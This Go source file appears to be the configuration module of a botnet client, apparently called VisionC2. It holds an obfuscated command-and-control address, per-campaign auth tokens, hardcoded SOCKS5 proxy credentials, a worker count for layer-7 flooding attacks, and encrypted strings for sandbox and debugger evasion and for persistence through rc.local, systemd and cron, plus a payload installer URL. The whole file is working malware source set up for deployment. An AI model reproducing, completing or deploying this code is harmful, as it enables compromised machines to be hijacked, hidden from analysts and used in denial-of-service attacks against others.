package main

import (
	"encoding/hex"
	"strings"
	"time"
)

// ============================================================================
// CONFIGURATION
// All tuneable constants and variables live here. setup.py updates this file.
// ============================================================================

// debugMode enables verbose logging to stdout (set false for production).
var debugMode = true

// --- C2 connection ---

// gothTits holds the obfuscated C2 address (generated by setup.py).
const gothTits = "gF7gqqRSqiWO83T6K+R461sPEG/KKYqOefLQLl4=" //change me run setup.py

// cryptSeed is the 8-char hex seed used for key derivation.
const cryptSeed = "b84c3691" //change me run setup.py

// magicCode is the shared auth token — must match CNC.
const magicCode = "7urUdq*^GW$IXK2w" //change this per campaign

// protocolVersion must match the CNC's protocol version string.
const protocolVersion = "v2.1.61" //change this per campaign

// fancyBearMin and fancyBearMax define the range for randomised reconnection delays.
var fancyBearMin = 4 * time.Second
var fancyBearMax = 7 * time.Second

// --- DNS ---

// lizardSquad lists DNS servers used for TXT record lookups (shuffled at runtime).
var lizardSquad = []string{
	"1.1.1.1:53",        // Cloudflare
	"8.8.8.8:53",        // Google
	"9.9.9.9:53",        // Quad9
	"208.67.222.222:53", // OpenDNS
	"1.0.0.1:53",        // Cloudflare secondary
}

// --- SOCKS5 proxy ---

// socksUsername and socksPassword gate the SOCKS5 proxy.
// Leave both empty to allow unauthenticated access.
// Protected by sockCredsMutex for concurrent read/write safety.
var socksUsername = "visionc2"
var socksPassword = "synackrst666"

// lazarusMax caps concurrent SOCKS5 connections.
var lazarusMax int32 = 100

// --- Paths ---

// daemonEnvKey, speedCachePath, instanceLockPath are decrypted at runtime.
var daemonEnvKey string
var speedCachePath string
var instanceLockPath string

// --- Misc ---

// cozyBear is the default number of concurrent workers for L7 attacks.
var cozyBear = 2024

// equationGroup is the standard buffer size for I/O operations.
const equationGroup = 256

// ============================================================================
// SENSITIVE STRINGS (AES-128-CTR ENCRYPTED)
// No plaintext in the binary. Decrypted at runtime by initSensitiveStrings().
// Re-generate with: go run tools/encrypt_strings.go
// ============================================================================

// Runtime-decrypted values (populated by initSensitiveStrings before use)
var (
	vmIndicators    []string
	analysisTools   []string
	parentDebuggers []string

	persistRcLocal          string
	persistHiddenDir        string
	persistScriptName       string
	persistBinaryName       string
	persistServicePath      string
	persistServiceName      string
	persistServiceContent   string
	persistScriptTemplate   string
	persistCronSchedule     string
)

// persistPayloadURL is NOT encrypted — needs to be easily updated per deployment.
var persistPayloadURL = "http://127.0.0.1/mods/installer.sh"

// --- Encrypted blobs (IV‖ciphertext, AES-128-CTR, key = XOR byte functions) ---
var encVmIndicators, _ = hex.DecodeString("38862d4de406eab7b94b2051f9663397e5aced47549cbefc25691f20029f40707db41cca898e0ffaca98a6648df26e8e8cb4e5d8b16058fd52c245c22edacd25705906420cc9b9fa0d2c861d3f2d5c53b3ffc3aeead67775ee9bf7843d17fe75a2911280e2bd383353f1c99362b2d83e2374fe0726f3f9249ca6")
var encAnalysisTools, _ = hex.DecodeString("9b6cea5b5f8be9ac3b2905472c4c988a910302211ed4fdc3db1ce7149c416d9ba78f74780974d00c0df60312bd7481d1332487585aa0089536276870c60257a668287d1f7e0475e39c6bb76b07ca063f584bf1d557b76165cafe8d0acd512d6355d7e62e4d8704c3f25bd786ab43546825c7db5edc2386efe6356ec0f21eae48dc5275119a048995c9816eaa13c9e0bcacfef689b2644207f977d3924ac84069ad3c498746226fea5444a750fe86bfd72ea65e66d9b1c322e2b1acef897f36adbda3fb70ec253169c339e87666b1fb97dd23e39f5fff18f544bc9f60d613d7f317df3128b4afbdbbad82f73f688575a281adb2cd15e9f00250553b1ff49dd428ea89dcabc65f4a9464902975ab03487f7219fbfffb347cedf6b7e48571ecfaa343c11a39386fff7d3f6332f7b37cc320ff4e7d9efce7996aca580eb233ca37d7b354b31ae4d663c00e8600a8061947140db2b01b99ee0f67908260d6e54ab3dd4c36138ae1f0cbd4a8af85df163f62e293a002e80353e89a74857eb9a099ff7af192c0e9206c8586094d0f75bc7563b9fbb0ebd74e18f05f320d59141ebb898b673eadcba9fdb745157f9022700a4fb3e4573375c2797879522bb3d9708480d8088ae8d36a3fc933a940e5f668da8a2e62d59683e41854593f68ea7d661389eb22c10c2255b3cea4280429480ed64b4d9379d6b76aabf877b19c39a29f31550bc990a46c4b6942a74b09b533cb4391ef4468b723dfff2a818c9728c6abcabb269cb5853959294332f79d6ae51650772507d069b0a4f0146febc610dd47963028a5287815ee28b0fda54359bd99ace43637128e0cd2f3745d9be8d2fccc5a95989a1285ba04a9766c3714da6a59456870b73794a2658955651a2407ab6ae48e5560d67677317503702e6182cb2330c262a8fcc770c740db4306075708e7c491274269180e7169c0504246b331aba5403613c90f4e5d25bef3f919185bbabb3550819ba9cef5a65ba9f52302529f3b3d972c74ea47796a6680393c79877d8bfbe2ba9d8e62a9ee5aeb6a5ba899879a69d10c4a43daa9d182196d897cc2a82445b7e3c2dddf0b6b2b36879e071532318246d32092e068d127ba542c429fddc1b9d3c414ad606ef338426df732f8a69b70584568b05837bec91ec76b")
var encParentDebuggers, _ = hex.DecodeString("aa4c983a58eb6853b1ade123560734f8011d866e2419e2f9a951d07167fc15e22a3644e49851db10b5be6e14dd66e90f17916b45b41e8e541cc2434e8ec659adfb5d8b62547adb7ff8a438c9a36d3883fb852090a9dc1b3a399731a91e2438a1d3670368a13acde92b4eb01edb73da57be4057825135f3d3a8846bf6")

var encPersistRcLocal, _ = hex.DecodeString("fd1e351140329314766fbfa3a78eb22108548722496ed6bb364d1cf32a")
var encPersistHiddenDir, _ = hex.DecodeString("0127318e19f52b9b77e2cefcef221076e307880f518c849758c73378c7faab6eab7d5ca768")
var encPersistScriptName, _ = hex.DecodeString("a1d704b9a371f9bf5156ab19617fd3777bfd3e0c22984851f086885dd2a6c5")
var encPersistBinaryName, _ = hex.DecodeString("0928a1d88c2970e07cd0ae66606100cd53728cb8af127b4dee7edb9935")
var encPersistServicePath, _ = hex.DecodeString("e00693030b47e46452d4ebce46d7331edccdf250cdd65d55974c68d9fcf614f53c54c99cf956f9549e9bd7a16bfb972ff933287ee50f1f")
var encPersistServiceName, _ = hex.DecodeString("7ee28a2fc20f9bc130d92ffe50ce17235547dfa4914cda51360706b78212d4e0d5c1b3")
var encPersistServiceContent, _ = hex.DecodeString("906ea7ec72e324f4ae601f77033007b5c0f7a410409ad6870983426d8585d3d198469d40b4a34ece56e53bc1923625d7b397d2467202e483033c53f208b4d65fa4fa9547058e17278daecdf41dc7a953ea2b6be0266e269ed2188ff8c3b9c9a8385bc01e73e7d64f6b3a782a6a5bfd05b91bcbbb0462eafb2e818476e14c7faa84f3a5b5d2044a6a5608b48516797d9bce94b09c7c897ad386e0e1487581a6688a778a2519eb93766da2d2766efd3ab78b4c303209256812da85049200e46463ac950c89e972824853f25855385247")
var encPersistScriptTemplate, _ = hex.DecodeString("cca6d9b916690e389e614d082f1edbe9f802826f798027cea2d3dd44e07d121f7f2759ce386c7298e5cd5bc0f8935ec64764dabee8cab492d3951be283a5fdb14dbc5e87934f5cd95628aca9c2b0a7cc871ebc4eba1e567caee461d7acc7f0b38272f6e06f4cc1b39f9eb9cec9654fd1fda2a3d5f3a9029ca10986d4d1013d107baf1e5495c62b9f217dda018db1cd59c455d52fd3eeabc398e96c84f485a085ff0b904e6b5a62074ae27282835d7de0466f5f130bd84593f5686fd395752003f9d907e18fd8")
var encPersistCronSchedule, _ = hex.DecodeString("5e5e1bbea8b44711deb58433af2ac7a136efe8e79bc0d57dc9")

var encDaemonEnvKey, _ = hex.DecodeString("727f0bd942c297be27a3461b397cac6194a37859398e6ffc8c5359ceff")
var encSpeedCachePath, _ = hex.DecodeString("d6525c338705990e7655bc29f57161d1a7aec2b998db1f167d1f27c68c1b21a9")
var encInstanceLockPath, _ = hex.DecodeString("e651c7eb3f9f66684d0a05ccc131b0f135a9a91c4b6f74832825e892a760")

// initSensitiveStrings decrypts all encrypted blobs into their runtime variables.
// Must be called once at startup before any code references these values.
func initSensitiveStrings() {
	// Slice values (null-byte separated)
	vmIndicators = strings.Split(string(garuda(encVmIndicators)), "\x00")
	analysisTools = strings.Split(string(garuda(encAnalysisTools)), "\x00")
	parentDebuggers = strings.Split(string(garuda(encParentDebuggers)), "\x00")

	// Single strings
	persistRcLocal = string(garuda(encPersistRcLocal))
	persistHiddenDir = string(garuda(encPersistHiddenDir))
	persistScriptName = string(garuda(encPersistScriptName))
	persistBinaryName = string(garuda(encPersistBinaryName))
	persistServicePath = string(garuda(encPersistServicePath))
	persistServiceName = string(garuda(encPersistServiceName))
	persistServiceContent = string(garuda(encPersistServiceContent))
	persistScriptTemplate = string(garuda(encPersistScriptTemplate))
	persistCronSchedule = string(garuda(encPersistCronSchedule))

	// Paths
	daemonEnvKey = string(garuda(encDaemonEnvKey))
	speedCachePath = string(garuda(encSpeedCachePath))
	instanceLockPath = string(garuda(encInstanceLockPath))
}
